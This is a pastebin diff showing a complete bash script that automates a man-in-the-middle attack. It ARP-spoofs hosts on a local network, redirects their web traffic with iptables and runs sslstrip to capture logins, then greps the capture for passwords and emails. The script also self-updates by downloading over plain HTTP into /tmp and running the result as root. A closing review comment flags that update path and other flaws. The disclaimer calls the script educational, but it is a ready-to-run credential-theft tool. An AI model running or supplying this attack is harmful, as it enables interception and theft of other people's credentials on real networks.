View difference between Paste ID: NM4T4H6b and
1-
1+
#!/bin/bash
2
# Little bash script to launch man it the middle attack and sslstrip.
3
# version 0.6 by comaX 
4
PROGNAME=$(basename $0)
5
VERSION="0.6.2"
6
#Let's define some arguments that can be passed to the script :
7
args=
8
while [ $# -ge 1 ] #check parameters
9
do
10
  case $1 in
11
 	-h | --help) #define help message
12
clear 
13
echo -e "You are running $0, version $VERSION.
14
15
usage : $0 [-h | --help] | [-u | --upadte]
16
	-h or --help : displays this help message, disclaimer and exit.
17
	-u or --update updates and installs this script
18
19
\033[31m DISCLAIMER :\033[m
20
This program is intended for learning purpose only. I do not condone hacking 
21
and wouldn't be held responsible for you actions. Only you would face legal
22
consequences if you used this script for illegal activities.
23
24
\033[31m What I think should be learnt from this script :\033[m
25
This script should teach you how easy it is to steal sensitive online
26
credential and how to protect you from it, provided you understand
27
what this program does. The best way to understand what it does is
28
to look at its source. This will also teach you very basic shell script
29
programming.
30
31
\033[31m Changelog :\033[m
32
added in v0.6
33
-Support for multiple targets
34
35
added in v0.5 :
36
-Parameters for this great help message and update, more comments.
37
-Minor improvments
38
39
added in v0.4 :
40
-User friendly case insensitive answers (Y/y)
41
-Option to map network, retrieving live hosts and their dns names
42
-Minor improvments
43
44
\033[31m Credits :\033[m
45
Credits goes to all people on backtrack forums for their help and support,
46
and google for being my best friend with scripting.
47
48
Please criticize this program or submit ideas on the official thread at
49
http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
50
exit ;;
51
	-u | --update) #update program
52
		echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
53
		read -e proceed
54
		if [[ $proceed = "y" || $proceed = "Y" ]] ; then
55
		wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
56
		cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
57
		rm /tmp/mitm_update.sh #delete temp file
58
		echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
59
		sleep 3
60
		chmod +x /usr/bin/mitm #make newly installed script executable
61
		/usr/bin/mitm #launch new script
62
		else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2		
63
		fi ;;
64
	*) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
65
  esac
66
  shift
67
done
68
69
clear
70
echo -e	"===========================================================================
71
=\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
72
=   Feel free to contribute, and distribute this script as you please.    =
73
=		Official thread : http://tiny.cc/mitmautomate		  =
74
=	Check out the help (-h) to see new features and informations  	  =
75
= 		    You are running version $VERSION.			  =
76
==========================================================================="
77
echo
78
echo
79
# Starting fresh : reset ip forward and iptables
80
echo -e "\033[31m [+] Cleaning iptables \033[m"
81
echo "[-] Cleaned."
82
echo "0" > /proc/sys/net/ipv4/ip_forward
83
iptables --flush
84
iptables --table nat --flush
85
iptables --delete-chain
86
iptables --table nat --delete-chain
87
88
# Defining exit function and other ending features
89
90
cleanup() {
91
echo
92
echo "[+] Killing processes and resetting iptable."
93
94
kill ${sslstripid}
95
killall arpspoof
96
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
97
iptables --flush 			# there are probably too many resets here,
98
iptables --table nat --flush		# but at least we're sure everything's clean
99
iptables --delete-chain
100
iptables --table nat --delete-chain
101
102
echo "[+] Clean up successful..."
103
echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
104
echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
105
egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
106
echo
107
echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
108
echo "If you want to keep it, it will be stored in /root/$filename.txt"
109
read -e keep
110
	if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
111
	mv /tmp/$filename.txt /root/$filename.txt #moving file
112
		if [ -f "/root/$filename.txt" ]; then #check if it exists
113
		echo "Log file copied !" #it does
114
		else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
115
		fi
116
	else rm /tmp/$filename.txt #removing temp file 
117
	echo "All logs deleted"
118
fi
119
if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
120
	echo
121
	echo
122
	exit 1 #if yes, exit.
123
	else 
124
	echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
125
	read -e install
126
		if [[ $install = "Y" || $install="y" ]] ; then
127
		cp ./mitm.sh /usr/bin/mitm #copy and rename script
128
		echo -e "\033[32m Script installed !\033[m"
129
		else echo "Script not installed."
130
		fi
131
	fi
132
133
exit
134
}
135
###############################End of functions#############################
136
# IP forwarding
137
echo
138
echo -e "\033[31m [+] Activating ip forwarding... \033[m"
139
echo "1" > /proc/sys/net/ipv4/ip_forward
140
echo "[-] Activated."
141
142
#Iptables
143
echo
144
echo -e "\033[31m [+] Configuring iptables... \033[m"
145
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
146
echo
147
read -e outport
148
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
149
echo
150
read -e inport
151
echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
152
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
153
echo "[-] Traffic rerouted"
154
155
#Arpspoofing
156
echo
157
echo -e "\033[31m [+] Activating arpspoofing... \033[m"
158
echo
159
ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
160
echo
161
echo "Enter gateway ip adress (as shown above) :"
162
read -e gateway
163
echo
164
echo "What interface would you like to use ? (it should match gateway ip as shown above)"
165
read -e iface
166
echo
167
echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
168
read -e choicearp
169
echo
170
171
if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
172
echo
173
echo -e "Do you want to map network to show live hosts ? (Y/N)	[This might take up to 30 secs, be patient]"
174
read -e hosts
175
echo -e "\033[31m "
176
	if [[ $hosts = "Y" || $hosts = "y" ]] ; then
177
	fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
178
	grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
179
	rm /tmp/hosts.txt # remove temporary file
180
	echo -e "\033[m " # switch color back to white
181
	else echo -e "\033[m "
182
fi
183
echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
184
arpspoofi() {
185
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
186
	
187
if [[ "$2" > "0" ]] ; then
188
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
189
		else echo
190
	fi	
191
if [[ "$3" > "0" ]] ; then
192
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
193
		else echo
194
	fi
195
if [[ "$4" > "0" ]] ; then 
196
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
197
	else echo
198
	fi
199
if [[ "$5" > "0" ]] ; then 
200
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
201
	else echo
202
	fi
203
if [[ "$6" > "0" ]] ; then 
204
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
205
else echo
206
	fi
207
t1=$1
208
t2=$2
209
t3=$3
210
t4=$4
211
t5=$5
212
t6=$6
213
214
}
215
echo "Enter ip adresses"
216
read -e parameters
217
arpspoofi $parameters
218
echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
219
echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
220
221
elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
222
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
223
sleep 2
224
echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
225
echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
226
227
else echo "Your choice is invalid. Quitting."
228
cleanup
229
fi
230
231
232
#Sslstrip
233
echo
234
echo -e "\033[31m [+] Activating sslstrip... \033[m"
235
echo  "Choose filename to output :"
236
read -e filename
237
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
238
sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
239
echo
240
echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
241
echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
242
echo
243
echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
244
echo
245
echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
246
echo
247
read quitting
248
if [ $quitting = "quit" ] ; then
249
250
cleanup
251
else echo "Bad choice. Enter quit to stop attack"
252
read -e quitting
253
if [ $quitting = "quit" ] ; then
254
cleanup
255
256
else echo "Bad choice. Enter quit to stop attack"
257
read -e quitting
258
if [ $quitting = "quit" ] ; then
259
cleanup
260
261
else echo "Bad choice. Enter quit to stop attack"
262
read -e quitting
263
if [ $quitting = "quit" ] ; then
264
cleanup
265
266
else echo "Bad choice. Enter quit to stop attack"
267
echo
268
echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
269
cleanup
270
fi
271
fi
272
fi
273
fi
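Review bot: The `-u | --update` branch downloads `http://comax.pagesperso-orange.fr/mitm.sh` over cleartext HTTP into the fixed path `/tmp/mitm_update.sh`, copies it to `/usr/bin/mitm` and executes it without any integrity check. The script writes to `/proc/sys/net/ipv4/ip_forward` and iptables, so it presumably runs as root; anyone on the network path, or a local user who pre-creates that /tmp file or a symlink in its place, could then control what gets installed and run. I would download into a private file created with `update_tmp=$(mktemp) || exit 1`, fetch from an HTTPS source, and verify a published checksum or signature before the `cp`, aborting the update if any step fails. The same fixed-name pattern recurs with `/tmp/hosts.txt` and `/tmp/$filename.txt`. Separately, `$install="y"` in `cleanup` has no spaces around `=`, so that test is always true and the install runs whatever the user answers.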